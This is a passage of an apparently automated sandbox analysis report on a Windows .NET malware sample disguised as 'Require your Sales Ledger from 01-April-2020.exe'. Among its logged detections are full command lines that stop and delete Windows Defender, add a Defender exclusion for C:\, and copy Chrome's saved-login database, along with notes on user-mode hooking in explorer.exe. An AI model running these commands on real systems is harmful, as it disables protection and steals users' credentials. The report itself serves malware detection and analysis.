                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Require your Sales Ledger from 01-April-2020.exeReversingLabs: Detection: 29%
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile read: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /RunJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /RunJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332Jump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
                  Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
                  Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
                  Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
                  Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: Require your Sales Ledger from 01-April-2020.exe, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.dr, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, u0002u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Yara detected Costura Assembly LoaderShow sources
                  Source: Yara matchFile source: Require your Sales Ledger from 01-April-2020.exe, type: SAMPLE
                  Source: Yara matchFile source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, type: DROPPED
                  Source: Yara matchFile source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, type: UNPACKEDPE
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040289F
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_0057A5EC push es; ret 0_2_0057A71A
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E27191 push ecx; ret 0_2_04E271A5
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E21B58 push esp; retf 0_2_04E21B59
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B564
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B550 push eax; ret 9_2_0040B58C
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret 13_2_0040B564
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret 13_2_0040B58C
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_0040B50D push ecx; ret 13_2_0040B51D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041C023 push eax; ret 24_2_0041C029
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0F2 push eax; ret 24_2_0041D0F8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0FB push eax; ret 24_2_0041D162
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D0A5 push eax; ret 24_2_0041D0F8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D15C push eax; ret 24_2_0041D162
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00416A81 pushfd ; ret 24_2_00416A8C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0040B28C pushad ; ret 24_2_0040B28D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041CFA2 push edx; iretd 24_2_0041CFAC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0078A5EC push es; ret 24_2_0078A71A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0124D0D1 push ecx; ret 24_2_0124D0E4
                  Source: C:\Windows\explorer.exeCode function: 25_2_061CB947 pushfd ; retf 25_2_061CB945
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D1D0D1 push ecx; ret 32_2_04D1D0E4
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B1B28C pushad ; ret 32_2_02B1B28D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2DA2D push cs; iretd 32_2_02B2DA2E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0A5 push eax; ret 32_2_02B2D0F8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0F2 push eax; ret 32_2_02B2D0F8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D0FB push eax; ret 32_2_02B2D162
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2C023 push eax; ret 32_2_02B2C029
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D9C9 push ecx; retf 32_2_02B2D9CA
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2D15C push eax; ret 32_2_02B2D162
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2CFA2 push edx; iretd 32_2_02B2CFAC
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.9825675946
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.9825675946
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exe
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exeJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exeJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exeJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: \require your sales ledger from 01-april-2020.exeJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_00401306

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                  Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00408E31
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
